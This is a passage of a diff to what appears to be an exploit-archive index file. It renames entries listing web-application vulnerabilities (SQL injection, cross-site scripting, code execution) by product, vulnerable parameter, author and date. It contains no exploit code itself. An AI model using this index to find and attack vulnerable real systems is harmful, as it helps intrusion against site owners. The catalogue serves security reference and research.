Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Plugin Banners Lite - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - Cross-Site Request Forgery",2015-10-07,hyp3rlinx,python,webapps,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory - Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 -38414,platforms/php/webapps/38414.txt,"WordPress Plugin Feedweb - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 +38414,platforms/php/webapps/38414.txt,"WordPress Plugin Feedweb - 'wp_post_id' Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 40407,platforms/aspx/webapps/40407.txt,"Microix Timesheet Module - SQL Injection",2016-09-22,"Anthony Cole",aspx,webapps,0 -38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 +38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 -38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 +38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum - Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 - 'came_from' HTTP Response Splitting",2015-10-08,LiquidWorm,multiple,webapps,0 -38425,platforms/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38426,platforms/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php id' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38427,platforms/php/webapps/38427.txt,"PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38428,platforms/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php site' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38429,platforms/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38430,platforms/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php BasicLogin' Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38432,platforms/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php var' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38433,platforms/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php email' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php Username' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38435,platforms/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php q' Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38425,platforms/php/webapps/38425.txt,"PHP Address Book - '/addressbook/register/delete_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38426,platforms/php/webapps/38426.txt,"PHP Address Book - '/addressbook/register/edit_user.php?id' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38427,platforms/php/webapps/38427.txt,"PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38428,platforms/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php?site' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38429,platforms/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38430,platforms/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php BasicLogin' Cookie SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38432,platforms/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php?var' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38433,platforms/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php?email' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38435,platforms/php/webapps/38435.txt,"PHP Address Book - '/addressbook/register/admin_index.php?q' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38436,platforms/php/webapps/38436.txt,"Zimbra - 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38438,platforms/php/webapps/38438.txt,"EasyPHP - 'index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 -38439,platforms/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 +38439,platforms/php/webapps/38439.txt,"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 -38441,platforms/php/webapps/38441.txt,"WordPress Plugin Spiffy XSPF Player - 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 +38441,platforms/php/webapps/38441.txt,"WordPress Plugin Spiffy XSPF Player - 'playlist_id' SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38445,platforms/php/webapps/38445.txt,"Joomla! Component com_realestatemanager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 @@ -36710,13 +36711,13 @@ id,file,description,date,author,platform,type,port 38449,platforms/hardware/webapps/38449.txt,"NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 38455,platforms/hardware/webapps/38455.txt,"ZYXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0 -38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter Cross-Site Scripting",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 -38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 - todooforum.php Multiple Parameter SQL Injection",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 -38458,platforms/php/webapps/38458.txt,"WordPress Plugin Spider Video Player - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 -38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 +38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 +38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 - 'todooforum.php' Multiple SQL Injections",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 +38458,platforms/php/webapps/38458.txt,"WordPress Plugin Spider Video Player - 'theme' SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 +38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' SQL Injection",2013-04-11,cheki,php,webapps,0 38460,platforms/jsp/webapps/38460.txt,"jPlayer - 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 -38461,platforms/java/webapps/38461.txt,"Hero Framework - '/users/login Username' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 -38462,platforms/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password error' Parameter Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38461,platforms/java/webapps/38461.txt,"Hero Framework - '/users/login?Username' Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 +38462,platforms/java/webapps/38462.txt,"Hero Framework - '/users/forgot_password?error' Cross-Site Scripting",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit - Information Disclosure",2013-04-13,MustLive,multiple,webapps,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 @@ -36732,17 +36733,17 @@ id,file,description,date,author,platform,type,port 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0 -38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 -38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Parameter Cross-Site Scripting",2013-05-07,"M. Heinzl",php,webapps,0 +38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps,0 +38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,"M. Heinzl",php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin - 'games.php' Multiple Cross-Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 38509,platforms/php/webapps/38509.txt,"Securimage - 'example_form.php' Cross-Site Scripting",2013-05-10,"Gjoko Krstic",php,webapps,0 38510,platforms/php/webapps/38510.txt,"WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting",2013-05-11,"Gjoko Krstic",php,webapps,0 38511,platforms/php/webapps/38511.txt,"Gallery Server Pro - Arbitrary File Upload",2013-05-14,"Drew Calcott",php,webapps,0 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution",2015-10-22,Photubias,hardware,webapps,0 -38515,platforms/php/webapps/38515.txt,"WordPress Plugin wp-FileManager - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 -38516,platforms/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 +38515,platforms/php/webapps/38515.txt,"WordPress Plugin wp-FileManager - 'path' Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 +38516,platforms/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 38517,platforms/php/webapps/38517.html,"WordPress Plugin Mail On Update - Cross-Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 -38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 +38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'x-forwarded-for' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38520,platforms/php/webapps/38520.html,"WordPress Plugin WP Cleanfix - Cross-Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 38523,platforms/php/webapps/38523.txt,"Weyal CMS - Multiple SQL Injections",2013-05-23,XroGuE,php,webapps,0 @@ -36768,7 +36769,7 @@ id,file,description,date,author,platform,type,port 38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 38565,platforms/php/webapps/38565.txt,"Joomla! Component com_jnews 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38567,platforms/php/webapps/38567.txt,"Max Forum - Multiple Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 -38568,platforms/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 +38568,platforms/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 38569,platforms/php/webapps/38569.txt,"Lokboard - 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps,0 38570,platforms/php/webapps/38570.txt,"ScriptCase - 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS - 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 @@ -36786,17 +36787,17 @@ id,file,description,date,author,platform,type,port 38593,platforms/cgi/webapps/38593.txt,"FtpLocate - HTML Injection",2013-06-24,Chako,cgi,webapps,0 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie - 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 -38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 +38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 38602,platforms/windows/webapps/38602.txt,"actiTIME 2015.2 - Multiple Vulnerabilities",2015-11-02,LiquidWorm,windows,webapps,0 38604,platforms/hardware/webapps/38604.txt,"Mobile USB Drive HD - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-06-28,"Benjamin Kunz Mejri",hardware,webapps,0 38605,platforms/php/webapps/38605.txt,"Nameko - 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 -38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 +38606,platforms/php/webapps/38606.txt,"WordPress Plugin WP Private Messages - 'msgid' SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite - 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 -38608,platforms/php/webapps/38608.txt,"WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38608,platforms/php/webapps/38608.txt,"WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38630,platforms/php/webapps/38630.html,"phpVibe 3.1 - Information Disclosure / Remote File Inclusion",2013-07-06,indoushka,php,webapps,0 -38621,platforms/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 -38624,platforms/php/webapps/38624.txt,"WordPress Plugin WP Feed - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 -38625,platforms/php/webapps/38625.txt,"WordPress Plugin Category Grid View Gallery - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38621,platforms/php/webapps/38621.txt,"WordPress Plugin Xorbin Digital Flash Clock - 'widgetUrl' Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38624,platforms/php/webapps/38624.txt,"WordPress Plugin WP Feed - 'nid' SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38625,platforms/php/webapps/38625.txt,"WordPress Plugin Category Grid View Gallery - 'ID' Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps,0 38642,platforms/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 @@ -36812,7 +36813,7 @@ id,file,description,date,author,platform,type,port 38651,platforms/php/webapps/38651.txt,"eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service)",2015-11-07,"Dawid Golunski",php,webapps,0 38652,platforms/php/webapps/38652.txt,"Google AdWords 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 38653,platforms/asp/webapps/38653.txt,"Corda Highwire - 'Highwire.ashx' Full Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 -38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 +38654,platforms/php/webapps/38654.txt,"OpenEMR 4.1 - 'note' HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector - 'redirector.corda' Cross-Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 38656,platforms/php/webapps/38656.html,"PrestaShop - Multiple Cross-Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Persistent Cross-Site Scripting",2015-11-09,Nu11By73,hardware,webapps,0 @@ -36821,21 +36822,21 @@ id,file,description,date,author,platform,type,port 38665,platforms/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Directory Traversal",2015-11-10,HaHwul,php,webapps,0 38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0 38673,platforms/php/webapps/38673.txt,"Collabtive - Multiple Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 -38674,platforms/php/webapps/38674.txt,"WordPress Plugin FlagEm - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 +38674,platforms/php/webapps/38674.txt,"WordPress Plugin FlagEm - 'cID' Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 38675,platforms/php/webapps/38675.html,"Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 38676,platforms/php/webapps/38676.txt,"WordPress Plugin Duplicator - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 -38677,platforms/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 +38677,platforms/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress Plugin WP Fastest Cache 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 -38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp site' Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 -38683,platforms/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 +38682,platforms/php/webapps/38682.txt,"Jahia xCM - '/engines/manager.jsp?site' Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 +38683,platforms/php/webapps/38683.txt,"Jahia xCM - '/administration/' Multiple Cross-Site Scripting Vulnerabilities",2013-07-31,"High-Tech Bridge",php,webapps,0 38688,platforms/php/webapps/38688.txt,"b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 38689,platforms/php/webapps/38689.txt,"Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 38695,platforms/php/webapps/38695.txt,"CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 -38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 +38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0 38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0 38706,platforms/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",multiple,webapps,0 @@ -36850,42 +36851,42 @@ id,file,description,date,author,platform,type,port 38739,platforms/java/webapps/38739.txt,"SearchBlox - Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",php,webapps,0 38744,platforms/php/webapps/38744.txt,"appRain CMF - Multiple Cross-Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 -38745,platforms/php/webapps/38745.txt,"Xibo - 'layout' Parameter HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 +38745,platforms/php/webapps/38745.txt,"Xibo - 'layout' HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 38746,platforms/php/webapps/38746.html,"Xibo - Cross-Site Request Forgery",2013-08-21,"Jacob Holcomb",php,webapps,0 -38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter SQL Injection",2013-09-03,ACC3SS,php,webapps,0 -38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 +38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' SQL Injection",2013-09-03,ACC3SS,php,webapps,0 +38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 38750,platforms/php/webapps/38750.txt,"WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38753,platforms/php/webapps/38753.html,"WordPress Plugin Event Easy Calendar - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 -38754,platforms/php/webapps/38754.txt,"eTransfer Lite - 'file name' Parameter HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 -38755,platforms/php/webapps/38755.txt,"WordPress Plugin mukioplayer4wp - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 +38754,platforms/php/webapps/38754.txt,"eTransfer Lite - 'file name' HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 +38755,platforms/php/webapps/38755.txt,"WordPress Plugin mukioplayer4wp - 'cid' SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 38756,platforms/php/webapps/38756.txt,"WordPress Plugin RokNewsPager - 'thumb.php' Multiple Vulnerabilities",2013-09-18,MustLive,php,webapps,0 38757,platforms/php/webapps/38757.txt,"WordPress Plugin RokStories - 'thumb.php' Multiple Vulnerabilities",2013-09-17,MustLive,php,webapps,0 38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Persistent Cross-Site Scripting",2015-11-19,Un_N0n,windows,webapps,0 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",php,webapps,80 38767,platforms/php/webapps/38767.txt,"WordPress Plugin RokIntroScroller - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38768,platforms/php/webapps/38768.txt,"WordPress Plugin RokMicroNews - 'thumb.php' Multiple Vulnerabilities",2013-09-19,MustLive,php,webapps,0 -38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 +38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 38770,platforms/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 -38781,platforms/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",php,webapps,0 +38781,platforms/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections",2013-10-02,"Yu-Chi Ding",php,webapps,0 38803,platforms/php/webapps/38803.txt,"WordPress Plugin WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80 38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 -38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 +38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38780,platforms/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 38783,platforms/php/webapps/38783.php,"WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 -38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 +38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 38786,platforms/php/webapps/38786.txt,"Ziteman CMS - Login Page 